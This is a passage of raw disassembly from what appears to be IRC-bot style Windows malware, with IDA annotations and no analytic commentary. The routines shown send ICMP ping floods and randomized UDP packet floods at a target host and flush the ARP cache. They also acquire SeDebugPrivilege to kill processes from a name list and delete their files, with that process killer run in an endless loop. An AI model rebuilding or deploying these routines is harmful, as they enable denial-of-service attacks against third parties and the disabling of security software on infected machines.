call sub_4075BC
push eax
lea eax, [ebp+var_21C]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax
call sub_4145E5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 24h
jmp short loc_407BD6
; ---------------------------------------------------------------------------
loc_407B65: ; CODE XREF: sub_407AC7+62�j
; sub_407AC7+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_407BE9
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_407BD6
loc_407B73: ; CODE XREF: sub_407AC7+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_407BB2
push dword ptr [edi]
push offset aS_3 ; " %S"
push eax
call sub_4145E5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_407B73
jmp short loc_407BD6
; ---------------------------------------------------------------------------
loc_407BB2: ; CODE XREF: sub_407AC7+B4�j
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_4145E5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 1Ch
loc_407BD6: ; CODE XREF: sub_407AC7+9C�j
; sub_407AC7+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_407BE9
push edi
call dword_435820
xor edi, edi
mov [ebp+var_4], edi
loc_407BE9: ; CODE XREF: sub_407AC7+A3�j
; sub_407AC7+114�j
cmp [ebp+var_10], 0EAh
jz loc_407B06
cmp edi, esi
pop ebx
jz short loc_407C02
push edi
call dword_435820
loc_407C02: ; CODE XREF: sub_407AC7+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_4145E5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_407AC7 endp
; =============== S U B R O U T I N E =======================================
sub_407C3B proc near ; CODE XREF: sub_4024E0+7�p
; sub_4039C6+7D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43585C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_407C63
push [esp+arg_0]
call dword_435848 ; gethostbyname
test eax, eax
jnz short loc_407C5C
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_407C5C: ; CODE XREF: sub_407C3B+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_407C63: ; CODE XREF: sub_407C3B+D�j
retn
sub_407C3B endp
; =============== S U B R O U T I N E =======================================
sub_407C64 proc near ; CODE XREF: sub_4088B9+138�p
mov ecx, dword_4358CC
xor eax, eax
test ecx, ecx
jz short locret_407C72
jmp ecx
; ---------------------------------------------------------------------------
locret_407C72: ; CODE XREF: sub_407C64+A�j
retn
sub_407C64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_407C73 proc near ; CODE XREF: sub_408A18:loc_40D012�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
xor eax, eax
push edi
inc eax
push eax
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+var_8]
xor ebx, ebx
push eax
push ebx
xor esi, esi
mov [ebp+78h+var_8], ebx
call dword_4357F4 ; GetIpNetTable
mov ecx, eax
sub ecx, ebx
jz short loc_407D03
sub ecx, 32h
jz loc_407D4A
sub ecx, 48h
jz short loc_407CCE
sub ecx, 6Eh
jz short loc_407CC7
loc_407CB3: ; CODE XREF: sub_407C73+8E�j
push eax
lea eax, [ebp+78h+var_88]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax
call sub_4145E5
add esp, 0Ch
jmp short loc_407D2B
; ---------------------------------------------------------------------------
loc_407CC7: ; CODE XREF: sub_407C73+3E�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_407D20
; ---------------------------------------------------------------------------
loc_407CCE: ; CODE XREF: sub_407C73+39�j
push [ebp+78h+var_8]
call sub_414E7D
pop ecx
mov ecx, [ebp+78h+var_8]
mov edx, ecx
mov esi, eax
shr ecx, 2
xor eax, eax
mov edi, esi
rep stosd
mov ecx, edx
and ecx, 3
cmp esi, ebx
rep stosb
jz short loc_407D1B
push 1
lea eax, [ebp+78h+var_8]
push eax
push esi
call dword_4357F4 ; GetIpNetTable
cmp eax, ebx
jnz short loc_407CB3
loc_407D03: ; CODE XREF: sub_407C73+2B�j
cmp [esi], ebx
jbe short loc_407D38
lea edi, [esi+4]
loc_407D0A: ; CODE XREF: sub_407C73+A4�j
push edi
call dword_435854 ; DeleteIpNetEntry
inc ebx
add edi, 18h
cmp ebx, [esi]
jb short loc_407D0A
jmp short loc_407D38
; ---------------------------------------------------------------------------
loc_407D1B: ; CODE XREF: sub_407C73+7D�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_407D20: ; CODE XREF: sub_407C73+59�j
; sub_407C73+DC�j
lea eax, [ebp+78h+var_88]
push eax
call sub_4145E5
pop ecx
pop ecx
loc_407D2B: ; CODE XREF: sub_407C73+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], ebx
call sub_401EFF
pop ecx
loc_407D38: ; CODE XREF: sub_407C73+92�j
; sub_407C73+A6�j
push esi
call sub_414A14
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_407D4A: ; CODE XREF: sub_407C73+30�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_407D20
sub_407C73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D51 proc near ; CODE XREF: sub_401141+21B�p
; sub_401141+32A�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
mov [ebp+var_4], 10h
call dword_435760 ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_436470
push esi
call sub_4145E5
add esp, 18h
pop edi
mov eax, esi
pop esi
leave
retn
sub_407D51 endp
; =============== S U B R O U T I N E =======================================
sub_407DA7 proc near ; CODE XREF: sub_4021B5+260�p
; sub_4021B5+28B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_407DD2
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_407DC5: ; CODE XREF: sub_407DA7+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_407DC5
pop edi
jmp short loc_407DD6
; ---------------------------------------------------------------------------
loc_407DD2: ; CODE XREF: sub_407DA7+A�j
mov esi, [esp+4+arg_0]
loc_407DD6: ; CODE XREF: sub_407DA7+29�j
test ecx, ecx
jz short loc_407DDF
movzx eax, byte ptr [esi]
add edx, eax
loc_407DDF: ; CODE XREF: sub_407DA7+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_407DA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407DF7 proc near ; DATA XREF: sub_408A18+54FA�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_414800
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_144]
rep movsd
inc ebx
mov [eax+120h], ebx
call dword_435838 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_43585C ; inet_addr
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_407E50
lea eax, [ebp+var_C0]
push eax
call dword_435848 ; gethostbyname
test eax, eax
jz short loc_407E56
loc_407E50: ; CODE XREF: sub_407DF7+46�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_407EB4
loc_407E56: ; CODE XREF: sub_407DF7+57�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_28], 0
jnz short loc_407E98
push 0
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4056FB
add esp, 14h
loc_407E98: ; CODE XREF: sub_407DF7+7E�j
lea eax, [ebp+var_344]
push eax
call sub_401EFF
push [ebp+var_30]
call sub_412735
pop ecx
pop ecx
push ebx
jmp loc_407F79
; ---------------------------------------------------------------------------
loc_407EB4: ; CODE XREF: sub_407DF7+5D�j
test eax, eax
jz short loc_407EC4
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_407EC7
; ---------------------------------------------------------------------------
loc_407EC4: ; CODE XREF: sub_407DF7+BF�j
mov [ebp+var_4], esi
loc_407EC7: ; CODE XREF: sub_407DF7+CB�j
push 7
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
cmp [ebp+var_3C], eax
jle short loc_407EE2
mov [ebp+var_3C], eax
loc_407EE2: ; CODE XREF: sub_407DF7+E6�j
cmp [ebp+var_38], ebx
jge short loc_407EEA
mov [ebp+var_38], ebx
loc_407EEA: ; CODE XREF: sub_407DF7+EE�j
xor edi, edi
xor esi, esi
cmp [ebp+var_40], edi
jle short loc_407F19
loc_407EF3: ; CODE XREF: sub_407DF7+120�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push edi
push [ebp+var_3C]
lea eax, [ebp+var_10320]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_4358D0 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_407EF3
loc_407F19: ; CODE XREF: sub_407DF7+FA�j
push [ebp+arg_0]
call dword_43586C ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_28], edi
jnz short loc_407F62
push edi
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4056FB
add esp, 14h
loc_407F62: ; CODE XREF: sub_407DF7+149�j
lea eax, [ebp+var_344]
push eax
call sub_401EFF
push [ebp+var_30]
call sub_412735
pop ecx
pop ecx
push edi
loc_407F79: ; CODE XREF: sub_407DF7+B8�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_407DF7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F80 proc near ; DATA XREF: sub_408A18+564C�o
var_10316 = byte ptr -10316h
var_10314 = byte ptr -10314h
var_338 = byte ptr -338h
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10314h
call sub_414800
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_138]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
pop ecx
push 11h
push 2
push 2
call dword_4357E8 ; socket
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_14], 2
call dword_43585C ; inet_addr
xor edi, edi
xor ecx, ecx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40805B
lea eax, [ebp+var_B4]
push eax
call dword_435848 ; gethostbyname
mov ecx, eax
cmp ecx, edi
jnz short loc_40805B
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_40803F
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4056FB
add esp, 14h
loc_40803F: ; CODE XREF: sub_407F80+9D�j
lea eax, [ebp+var_338]
push eax
call sub_401EFF
push [ebp+var_24]
call sub_412735
pop ecx
pop ecx
push esi
jmp loc_408194
; ---------------------------------------------------------------------------
loc_40805B: ; CODE XREF: sub_407F80+6A�j
; sub_407F80+7D�j
cmp [ebp+var_28], edi
jge short loc_408063
mov [ebp+var_28], edi
loc_408063: ; CODE XREF: sub_407F80+DE�j
mov eax, 0FFFFh
cmp [ebp+var_28], eax
jle short loc_408070
mov [ebp+var_28], eax
loc_408070: ; CODE XREF: sub_407F80+EB�j
cmp ecx, edi
jz short loc_40807B
mov eax, [ecx+0Ch]
mov eax, [eax]
jmp short loc_40807E
; ---------------------------------------------------------------------------
loc_40807B: ; CODE XREF: sub_407F80+F2�j
lea eax, [ebp+arg_0]
loc_40807E: ; CODE XREF: sub_407F80+F9�j
cmp [ebp+var_28], edi
mov eax, [eax]
mov [ebp+var_10], eax
jnz short loc_408099
call sub_4147A1
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40809C
; ---------------------------------------------------------------------------
loc_408099: ; CODE XREF: sub_407F80+106�j
push [ebp+var_28]
loc_40809C: ; CODE XREF: sub_407F80+117�j
call dword_435934 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_34]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_2C], edi
mov [ebp+var_34], eax
jnz short loc_4080BA
mov [ebp+var_2C], esi
loc_4080BA: ; CODE XREF: sub_407F80+135�j
xor esi, esi
cmp [ebp+var_30], edi
jle short loc_408135
loc_4080C1: ; CODE XREF: sub_407F80+159�j
call sub_4147A1
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_30]
mov [ebp+esi-10315h], dl
jl short loc_4080C1
jmp short loc_408135
; ---------------------------------------------------------------------------
loc_4080DD: ; CODE XREF: sub_407F80+1B8�j
dec [ebp+var_34]
push 0Bh
pop esi
loc_4080E3: ; CODE XREF: sub_407F80+195�j
push 10h
lea eax, [ebp+var_14]
push eax
push edi
call sub_4147A1
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_30]
sub eax, edx
push eax
lea eax, [ebp+var_10314]
push eax
push [ebp+var_4]
call dword_4357B8 ; sendto
push [ebp+var_2C]
call ds:dword_420000 ; Sleep
dec esi
jnz short loc_4080E3
cmp [ebp+var_28], edi
jnz short loc_408135
call sub_4147A1
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_435934 ; ntohs
mov [ebp+var_12], ax
loc_408135: ; CODE XREF: sub_407F80+13F�j
; sub_407F80+15B�j ...
cmp [ebp+var_34], edi
jg short loc_4080DD
dec [ebp+var_34]
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_40817D
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4056FB
add esp, 14h
loc_40817D: ; CODE XREF: sub_407F80+1DB�j
lea eax, [ebp+var_338]
push eax
call sub_401EFF
push [ebp+var_24]
call sub_412735
pop ecx
pop ecx
push edi
loc_408194: ; CODE XREF: sub_407F80+D6�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_407F80 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40819B proc near ; CODE XREF: sub_4037CA+45�p
; sub_4037CA+165�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_4200E0 ; GetCurrentProcess
push eax
call dword_43591C ; OpenProcessToken
test eax, eax
jnz short loc_4081BA
leave
retn
; ---------------------------------------------------------------------------
loc_4081BA: ; CODE XREF: sub_40819B+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_435904 ; LookupPrivilegeValueA
test eax, eax
jz short loc_4081F8
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_4081E1
or [ebp+var_8], 2
jmp short loc_4081E5
; ---------------------------------------------------------------------------
loc_4081E1: ; CODE XREF: sub_40819B+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_4081E5: ; CODE XREF: sub_40819B+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_435850 ; AdjustTokenPrivileges
mov esi, eax
loc_4081F8: ; CODE XREF: sub_40819B+32�j
push [ebp+var_4]
call ds:dword_42003C ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_40819B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408206 proc near ; CODE XREF: sub_408519+68�p
; sub_40861B+C�p ...
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_4357D8, ebx
pop ecx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_408417
cmp dword_435834, ebx
jz loc_408417
cmp dword_435798, ebx
jz loc_408417
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40819B
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4357D8 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_40840A
lea eax, [ebp+var_12C]
push eax
push edi
mov [ebp+var_12C], 128h
call dword_435834 ; Process32First
test eax, eax
mov esi, ds:dword_42003C
jz loc_408405
lea eax, [ebp+var_12C]
push eax
push edi
call dword_435798 ; Process32Next
test eax, eax
jz loc_408405
mov ebx, ds:dword_420078
loc_4082C5: ; CODE XREF: sub_408206+1F7�j
cmp [ebp+arg_10], 0
jz short loc_408326
xor edi, edi
loc_4082CD: ; CODE XREF: sub_408206+E7�j
push off_42B4D0[edi]
lea eax, [ebp+var_108]
push eax
call ds:dword_4200EC ; lstrcmpiA
test eax, eax
jz short loc_4082F4
add edi, 4
cmp edi, 9E0h
jb short loc_4082CD
jmp loc_4083EB
; ---------------------------------------------------------------------------
loc_4082F4: ; CODE XREF: sub_408206+DC�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_4083EB
push 0
push edi
call ds:dword_4200E8 ; TerminateProcess
test eax, eax
jnz loc_4083EB
loc_40831E: ; CODE XREF: sub_408206+1AF�j
push edi
call esi ; CloseHandle
jmp loc_4083EB
; ---------------------------------------------------------------------------
loc_408326: ; CODE XREF: sub_408206+C3�j
mov edi, [ebp+arg_C]
test edi, edi
jnz loc_4083BA
cmp [ebp+arg_4], edi
jz loc_4083EB
push [ebp+var_124]
push 8
call dword_4357D8 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_40837A
lea eax, [ebp+var_350]
push eax
push edi
call dword_435800 ; Module32First
test eax, eax
push [ebp+var_124]
jz short loc_408380
lea eax, [ebp+var_230]
jmp short loc_408386
; ---------------------------------------------------------------------------
loc_40837A: ; CODE XREF: sub_408206+152�j
push [ebp+var_124]
loc_408380: ; CODE XREF: sub_408206+16A�j
lea eax, [ebp+var_108]
loc_408386: ; CODE XREF: sub_408206+172�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_4145E5
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
jmp loc_40831E
; ---------------------------------------------------------------------------
loc_4083BA: ; CODE XREF: sub_408206+125�j
lea eax, [ebp+var_108]
loc_4083C0: ; CODE XREF: sub_408206+1D6�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_4083E2
test cl, cl
jz short loc_4083DE
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_4083E2
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_4083C0
loc_4083DE: ; CODE XREF: sub_408206+1C4�j
xor eax, eax
jmp short loc_4083E7
; ---------------------------------------------------------------------------
loc_4083E2: ; CODE XREF: sub_408206+1C0�j
; sub_408206+1CE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4083E7: ; CODE XREF: sub_408206+1DA�j
test eax, eax
jz short loc_40841E
loc_4083EB: ; CODE XREF: sub_408206+E9�j
; sub_408206+101�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_435798 ; Process32Next
test eax, eax
jnz loc_4082C5
xor ebx, ebx
loc_408405: ; CODE XREF: sub_408206+9D�j
; sub_408206+B3�j
push [ebp+var_4]
call esi ; CloseHandle
loc_40840A: ; CODE XREF: sub_408206+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40819B
pop ecx
pop ecx
loc_408417: ; CODE XREF: sub_408206+3A�j
; sub_408206+46�j ...
xor eax, eax
loc_408419: ; CODE XREF: sub_408206+30E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40841E: ; CODE XREF: sub_408206+1E3�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+var_124]
mov edi, eax
push 8
call dword_4357D8 ; CreateToolhelp32Snapshot
push [ebp+var_4]
mov ebx, eax
mov [ebp+var_350], 224h
call esi ; CloseHandle
push 0
push edi
call ds:dword_4200E8 ; TerminateProcess
test eax, eax
jnz short loc_408463
push edi
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
jmp short loc_408417
; ---------------------------------------------------------------------------
loc_408463: ; CODE XREF: sub_408206+253�j
cmp [ebp+arg_18], 0
jz loc_408511
lea eax, [ebp+var_350]
push eax
push ebx
call dword_435800 ; Module32First
test eax, eax
jz short loc_4084D6
push ebx
call esi ; CloseHandle
xor esi, esi
loc_408484: ; CODE XREF: sub_408206+2B2�j
push 7D0h
call ds:dword_420000 ; Sleep
push 20h
lea eax, [ebp+var_230]
push eax
inc esi
call ds:dword_4200CC ; SetFileAttributesA
lea eax, [ebp+var_230]
push eax
call ds:dword_4200E4 ; DeleteFileA
test eax, eax
setnz al
test al, al
jnz short loc_4084C8
cmp esi, 5
jl short loc_408484
lea eax, [ebp+var_230]
push eax
push offset aCouldNotDelete ; "Could not delete '%s'.!\n"
jmp short loc_4084E2
; ---------------------------------------------------------------------------
loc_4084C8: ; CODE XREF: sub_408206+2AD�j
lea eax, [ebp+var_230]
push eax
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'.\n"
jmp short loc_4084E2
; ---------------------------------------------------------------------------
loc_4084D6: ; CODE XREF: sub_408206+277�j
lea eax, [ebp+var_108]
push eax
push offset aCannotExtractP ; "Cannot extract process path for %s\n"
loc_4084E2: ; CODE XREF: sub_408206+2C0�j
; sub_408206+2CE�j
lea eax, [ebp+var_550]
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_408511
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_408511: ; CODE XREF: sub_408206+261�j
; sub_408206+2EF�j
xor eax, eax
inc eax
jmp loc_408419
sub_408206 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_408519 proc near ; DATA XREF: sub_408A18+4833�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_298]
push offset aProcListingPro ; "[PROC]: Listing processes:"
push eax
call sub_4145E5
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_408571
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4056FB
add esp, 14h
loc_408571: ; CODE XREF: sub_408519+3C�j
push esi
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_408206
add esp, 1Ch
test eax, eax
lea eax, [ebp+74h+var_298]
jnz short loc_40859A
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_40859F
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: sub_408519+78�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_40859F: ; CODE XREF: sub_408519+7F�j
push eax
call sub_4145E5
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4085C6
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4056FB
add esp, 14h
loc_4085C6: ; CODE XREF: sub_408519+91�j
lea eax, [ebp+74h+var_298]
push eax
call sub_401EFF
push [ebp+74h+var_14]
call sub_412735
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_408519 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4085E4 proc near ; CODE XREF: sub_408A18+3994�p
; sub_41255A+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call ds:dword_420078 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_408616
push 0
push esi
call ds:dword_4200E8 ; TerminateProcess
test eax, eax
jnz short loc_408616
push esi
xor edi, edi
call ds:dword_42003C ; CloseHandle
loc_408616: ; CODE XREF: sub_4085E4+1A�j
; sub_4085E4+27�j
mov eax, edi
pop edi
pop esi
retn
sub_4085E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40861B proc near ; DATA XREF: sub_408A18+1EFC�o
push esi
xor esi, esi
loc_40861E: ; CODE XREF: sub_40861B+20�j
push esi
push 1
push 1
push esi
push esi
push esi
push esi
call sub_408206
add esp, 1Ch
push dword_42B4C8
call ds:dword_420000 ; Sleep
jmp short loc_40861E
sub_40861B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_40863D proc near ; CODE XREF: sub_4088B9+D0�p
var_1E1C = byte ptr -1E1Ch
var_E1C = byte ptr -0E1Ch
